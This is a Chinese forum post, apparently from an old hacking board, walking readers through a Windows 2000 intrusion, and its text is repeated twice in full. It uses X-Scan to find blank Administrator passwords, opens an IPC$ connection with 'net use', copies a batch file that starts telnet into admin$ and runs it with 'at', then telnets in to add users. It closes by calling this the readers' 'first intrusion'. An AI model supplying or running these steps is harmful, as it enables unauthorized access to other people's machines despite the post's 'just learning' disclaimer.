- 注册
- 2004-11-09
- 帖子
- 520
- 反馈评分
- 0
- 点数
- 1
- 年龄
- 40
A.什么是ipc?
IPC$是共享“命名管道”的资源,它对于程序间的通讯很重要。在远程管理计算机和查看计算机的共享资源时使用.利用IPC$我们可以与目标主机建立一个空的连接(无需用户名与密码),而利用这个空的连接,我们就可以得到目标主机上的用户列表。用“流光”的IPC$探测功能,就可以得到用户列表了,并可以配合字典,进行密码尝试。
B.OK!运用我在上贴所说的知识跟我冲吧!掌握好你的命令使用了吗?
需要用的的扫描软件:xscan (有需要的话我可以上传附件)操作系统:win2000(98和ME是不行的,最少没有支持CMD。不过现在出了XP/2003都行)
首先我们使用扫描器扫描一个IP段.打开xscan,选择"设置",再选"扫描模块",然后只选nt弱口令的那项.确定后选"设置","扫描参数"然后填入IP段.就127.0.0.1-127.0.0.255吧!(注意:IP段纯属虚构.)
假设我们已经扫到一个了.127.0.0.2 用户名:Administrator 密码:空(唉~真搞不清现在的人为什么这么没安全意识...)
打开cmd,输入:net use \\127.0.0.1\ipc$ "" /user:"Administrator" 命令成功完成.OK!下一步~
at \\127.0.0.1 \\这步纯属个人习惯.因为我想知道他开了AT没有.没开就放弃吧\\
接下来我们需要编辑一个批处理文件.打开记事本,输入如下内容net start telnet 然后保存为a.bat \\注意扩展名!是bat!\\
编辑好后就继续吧! copy a.bat \\127.0.0.1\admin$ \\admin$就是放在目标winnt的根目录下\\
net time \\127.0.0.1 \\看看目标的时间吧!有用的~\\
假设是晚上9点.接着下一步吧!
at \\127.0.0.1 20:01 a.bat \\用AT命令让目标运行a.bat.注意时间要24小时制的!\\
net time \\127.0.0.1 \\看看到时间没?\\
假设到了,我们就实行下一步吧!
telnet 127.0.0.1 \\登陆到对方的机子上.刚才的那个批处理就是用来打开它的23端口的~\\
接着输入用户名和密码 \\就是用户Administrator啊!密码是空的.回车就行了~\\
OK!一切成功!现在你可以做你想做的事了~例如添加用户等等(就是命令的使用啊!所以说命令重要!)
请同学们注意不要乱删除别人的东西!我们只是学习技术.谁乱动我立即把他开除.
好了~现在你们应该可以去实行自己的第一次入侵了~当然实际操作中并不全像上面的那么容易.会出现很多问题的.例如at不能执行.telnet上去时需要验证等等.这就留待你们自己去解决了~
IPC$是共享“命名管道”的资源,它对于程序间的通讯很重要。在远程管理计算机和查看计算机的共享资源时使用.利用IPC$我们可以与目标主机建立一个空的连接(无需用户名与密码),而利用这个空的连接,我们就可以得到目标主机上的用户列表。用“流光”的IPC$探测功能,就可以得到用户列表了,并可以配合字典,进行密码尝试。
B.OK!运用我在上贴所说的知识跟我冲吧!掌握好你的命令使用了吗?
需要用的的扫描软件:xscan (有需要的话我可以上传附件)操作系统:win2000(98和ME是不行的,最少没有支持CMD。不过现在出了XP/2003都行)
首先我们使用扫描器扫描一个IP段.打开xscan,选择"设置",再选"扫描模块",然后只选nt弱口令的那项.确定后选"设置","扫描参数"然后填入IP段.就127.0.0.1-127.0.0.255吧!(注意:IP段纯属虚构.)
假设我们已经扫到一个了.127.0.0.2 用户名:Administrator 密码:空(唉~真搞不清现在的人为什么这么没安全意识...)
打开cmd,输入:net use \\127.0.0.1\ipc$ "" /user:"Administrator" 命令成功完成.OK!下一步~
at \\127.0.0.1 \\这步纯属个人习惯.因为我想知道他开了AT没有.没开就放弃吧\\
接下来我们需要编辑一个批处理文件.打开记事本,输入如下内容net start telnet 然后保存为a.bat \\注意扩展名!是bat!\\
编辑好后就继续吧! copy a.bat \\127.0.0.1\admin$ \\admin$就是放在目标winnt的根目录下\\
net time \\127.0.0.1 \\看看目标的时间吧!有用的~\\
假设是晚上9点.接着下一步吧!
at \\127.0.0.1 20:01 a.bat \\用AT命令让目标运行a.bat.注意时间要24小时制的!\\
net time \\127.0.0.1 \\看看到时间没?\\
假设到了,我们就实行下一步吧!
telnet 127.0.0.1 \\登陆到对方的机子上.刚才的那个批处理就是用来打开它的23端口的~\\
接着输入用户名和密码 \\就是用户Administrator啊!密码是空的.回车就行了~\\
OK!一切成功!现在你可以做你想做的事了~例如添加用户等等(就是命令的使用啊!所以说命令重要!)
请同学们注意不要乱删除别人的东西!我们只是学习技术.谁乱动我立即把他开除.
好了~现在你们应该可以去实行自己的第一次入侵了~当然实际操作中并不全像上面的那么容易.会出现很多问题的.例如at不能执行.telnet上去时需要验证等等.这就留待你们自己去解决了~